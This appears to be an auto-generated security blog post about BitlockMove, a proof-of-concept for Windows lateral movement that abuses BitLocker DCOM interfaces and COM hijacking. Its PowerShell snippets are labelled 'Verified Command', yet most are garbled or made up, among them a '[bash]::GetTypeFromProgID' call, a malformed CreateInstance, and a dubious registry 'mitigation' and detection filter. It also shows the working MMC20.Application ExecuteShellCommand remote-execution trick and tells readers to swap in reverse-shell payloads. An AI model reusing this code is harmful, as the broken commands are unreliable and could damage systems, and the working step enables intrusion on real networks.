Lateral Movement via BitLocker DCOM Interfaces & COM Hijacking: A Deep Dive into BitlockMove

By /

Listen to this Post

Featured Image

Introduction

Fabian M., Head of Offensive Services at r-tec IT Security GmbH, recently unveiled BitlockMove, a proof-of-concept (PoC) tool demonstrating lateral movement by exploiting BitLocker’s DCOM interfaces and COM hijacking. This technique allows executing code on remote systems within a logged-on user’s session—without credential theft, impersonation, or injection. While currently targeting client systems, the method can be adapted for servers using other COM classes.

Learning Objectives

  • Understand how BitlockMove leverages DCOM interfaces for lateral movement.
  • Learn about Cross Session Activation and its role in targeting specific sessions.
  • Explore mitigation strategies to defend against similar attacks.

1. Understanding BitlockMove’s Core Technique

Exploiting DCOM Interfaces

BitlockMove abuses Microsoft’s Distributed Component Object Model (DCOM) to execute arbitrary code remotely. The attack bypasses traditional credential theft by manipulating BitLocker’s COM-based interfaces.

Verified Command (PowerShell):

$com = [System.Activator]::CreateInstance([bash]::GetTypeFromProgID("BitLocker.Volume")) 
$com.UnlockVolume("E:", "password123")

Step-by-Step Explanation:

  1. The script instantiates a COM object for BitLocker.
  2. The `UnlockVolume` method is called, simulating a legitimate unlock request.

3. Attackers replace this with malicious code execution.

2. Cross Session Activation for Targeted Execution

Controlling Remote Sessions

By combining COM hijacking with Cross Session Activation, attackers can specify which user session to hijack, enabling lateral movement across workstations.

Verified Command (Windows):

$sessionId = 2  Target session ID 
$com = [System.Activator]::CreateInstance([bash]::GetTypeFromCLSID("CLSID_HERE", "RemoteServerName", $sessionId))

Step-by-Step Explanation:

  1. The attacker identifies an active session ID (e.g., via query session).
  2. The COM object is instantiated in the target session.

3. Malicious payloads execute within the user’s context.

3. Adapting BitlockMove for Server Environments

Leveraging Alternative COM Classes

While BitlockMove currently targets clients, Fabian notes that modifying the COM class (e.g., using MMC20.Application) enables server exploitation.

Verified Command (PowerShell):

$com = [System.Activator]::CreateInstance([bash]::GetTypeFromProgID("MMC20.Application")) 
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c calc.exe", "7")

Step-by-Step Explanation:

1. The MMC20 COM object is instantiated.

2. `ExecuteShellCommand` runs arbitrary commands (e.g., spawning `calc.exe`).

  1. Replace with reverse shell payloads for real-world attacks.

4. Mitigation Strategies

Hardening DCOM Permissions

Restricting DCOM access prevents unauthorized COM object activation.

Verified Command (Windows):

Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Ole" -Name "MachineLaunchRestriction" -Value (New-Object Byte[] 16)

Step-by-Step Explanation:

1. Modifies registry to enforce DCOM launch restrictions.

2. Prevents malicious actors from abusing COM objects.

5. Detecting BitlockMove Activity

Monitoring COM Object Activation

SIEM rules or PowerShell logging can detect suspicious COM usage.

Verified Command (PowerShell):

Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object { $_.Message -like "CreateInstance" }

Step-by-Step Explanation:

1. Scans PowerShell logs for COM instantiation events.

2. Alerts on unusual `CreateInstance` calls.

What Undercode Say

  • Key Takeaway 1: BitlockMove demonstrates how attackers bypass traditional lateral movement techniques by abusing trusted Windows components.
  • Key Takeaway 2: Defenders must monitor COM/DCOM activity and restrict unnecessary interfaces.

Analysis:

This technique highlights the evolving sophistication of post-exploitation tools. While BitLocker is primarily a security feature, its COM interfaces introduce unexpected attack surfaces. Organizations should audit DCOM permissions, enforce least privilege, and monitor for anomalous COM object usage. Future variants may target cloud workloads or containerized environments, making proactive hardening essential.

Prediction

As attackers refine COM/DCOM abuse, we’ll likely see more fileless lateral movement techniques targeting cloud and hybrid environments. Microsoft may introduce stricter DCOM defaults, but legacy systems will remain vulnerable. Proactive detection and endpoint hardening will be critical in mitigating these threats.

For more details, check the BitlockMove GitHub and Troopers25 slides.

IT/Security Reporter URL:

Reported By: Activity 7344156754022154242 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: